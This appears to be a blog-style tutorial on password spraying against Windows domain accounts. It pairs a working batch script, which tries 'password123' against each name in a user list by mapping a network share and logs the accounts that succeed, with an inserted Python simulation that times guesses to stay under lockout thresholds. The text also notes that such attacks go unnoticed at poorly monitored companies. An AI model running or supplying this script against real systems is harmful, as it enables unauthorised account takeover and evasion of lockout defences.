Yes, it is possible to break into a user account using nothing but a batch file, a list of user names and a single guessed password.
Quite often a run of consecutive failed logins against one account locks that account out, typically for around 15 minutes. That is an irritation for an attacker, because a single account cannot simply be brute forced… HOWEVER

Given a list of user names and a single password, we can test that one password against every user name we have on file. Each account sees only one failed attempt, so no lockout threshold is ever reached; this is the technique usually called password spraying. If you want to try more than one password, keep the number of guesses per account below the lockout threshold within the policy's observation window. The burst of failed logons from one source across many different accounts may well trip a SIEM, IDS or IPS, but at smaller companies with little monitoring this is likely to work a treat.
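To make the lockout arithmetic concrete, here is an added example that is not part of the original post. It is written in Python rather than batch so the scheduling logic is easy to read, and it goes slightly beyond the post by spraying several passwords: guesses are batched so that no account ever sees more than threshold-1 failures inside one observation window. The directory, user names, passwords and the threshold/window values are all constructed for the demonstration; the naive one-account loop is included to show the lockout the post warns about.

```python
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class SimDirectory:
    """Constructed stand-in for a domain's account-lockout policy.

    An account is locked once `threshold` failed attempts fall inside one
    `window` (seconds), mirroring the 'N failures in 15 minutes' policy the
    post describes. Real policies differ in how the failure counter resets.
    """
    creds: dict                                  # user -> real password (constructed sample)
    threshold: int = 5                           # failed attempts that trigger a lockout
    window: int = 15 * 60                        # observation / lockout window in seconds
    failures: dict = field(default_factory=lambda: defaultdict(list))
    locked: set = field(default_factory=set)
    attempts: int = 0

    def authenticate(self, user: str, password: str, now: int) -> bool:
        self.attempts += 1
        if user in self.locked:
            return False                         # a locked account rejects even the right password
        recent = [t for t in self.failures[user] if now - t < self.window]
        self.failures[user] = recent
        if self.creds.get(user) == password:
            self.failures[user].clear()
            return True
        recent.append(now)
        if len(recent) >= self.threshold:
            self.locked.add(user)
        return False


def spray(directory: SimDirectory, users, passwords, threshold: int, window: int,
          start: int = 0, step: int = 1) -> dict:
    """Password spray: every password is tried against every user, but no
    account sees more than threshold-1 failures inside one window.

    Passwords are processed in batches of threshold-1; after each batch the
    sprayer waits a full window so the batch's failures age out before the
    next batch begins. Returns {user: password} for the accounts cracked.
    """
    per_window = threshold - 1
    if per_window < 1:
        raise ValueError("a threshold of 1 leaves no room to guess safely")
    found = {}
    now = start
    for i in range(0, len(passwords), per_window):
        for pw in passwords[i:i + per_window]:
            for user in users:
                if user in found:
                    continue                      # do not burn attempts on solved accounts
                if directory.authenticate(user, pw, now):
                    found[user] = pw
                now += step                       # one attempt every `step` seconds
        now += window                             # let this batch's failures expire
    return found


def brute_force_one_user(directory: SimDirectory, user: str, passwords,
                         start: int = 0, step: int = 1):
    """The naive approach the post contrasts with: hammer a single account."""
    now = start
    for pw in passwords:
        if directory.authenticate(user, pw, now):
            return pw
        now += step
    return None


# Constructed sample data standing in for userlist.txt and the real passwords.
USERS = ["alice", "bob", "carol", "dave"]
REAL = {"alice": "c0rrecthorse", "bob": "Password123",
        "carol": "Tr0ub4dor&3", "dave": "Winter2024!"}
GUESSES = ["Password123", "Spring2024!", "Summer2024!", "Winter2024!"]


def demo():
    policy = dict(threshold=3, window=15 * 60)   # 3 failures in 15 minutes locks the account
    sprayed = SimDirectory(REAL, **policy)
    found = spray(sprayed, USERS, GUESSES, **policy)
    hammered = SimDirectory(REAL, **policy)
    hit = brute_force_one_user(hammered, "dave", GUESSES)
    return found, sorted(sprayed.locked), hit, sorted(hammered.locked)


if __name__ == "__main__":
    print(demo())
```

With a threshold of 3 the sprayer tries two passwords per window, waits, then tries the next two: it recovers bob's and dave's passwords and locks nobody. Hammering dave with the same four guesses locks his account on the third failure, so the fourth (correct) guess is rejected and the attacker learns nothing except that the account is now locked.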
We simply need one file in the same location as the batch file, named ‘userlist.txt’, with one user name per line. The results file is created automatically. All the script does is attempt, once per user name, to map a share that I know everyone should have access to, authenticating as that user with the generic password ‘password123’.

If the script finds that f:\ is mapped after the attempt, it logs that user name in the results file as a success, then disconnects the drive before moving on to the next name.

This attack is useful when you do not have the domain's NTDS.DIT file to crack offline in John the Ripper (JTR).
```batch
@ECHO OFF
REM Start clean: if f: is already mapped from an earlier run, drop it.
if exist f:\ (
    net use f: /delete
)
echo Successes>results.txt
echo ###########>>results.txt
REM One user name per line in userlist.txt; try each in turn.
for /F "tokens=1" %%i in (userlist.txt) do call :process %%i
goto thenextstep

:process
set VAR1=%1
REM Try to map a share everyone can reach, as this user with the sprayed password.
net use f: \\127.0.0.1\testShare /USER:abyz\%1 password123
if exist f:\ (
    REM The mapping worked, so the password is valid for this user.
    echo %1>>results.txt
    net use f: /delete
    echo %1
)
goto :EOF

:thenextstep
net use f: /delete
```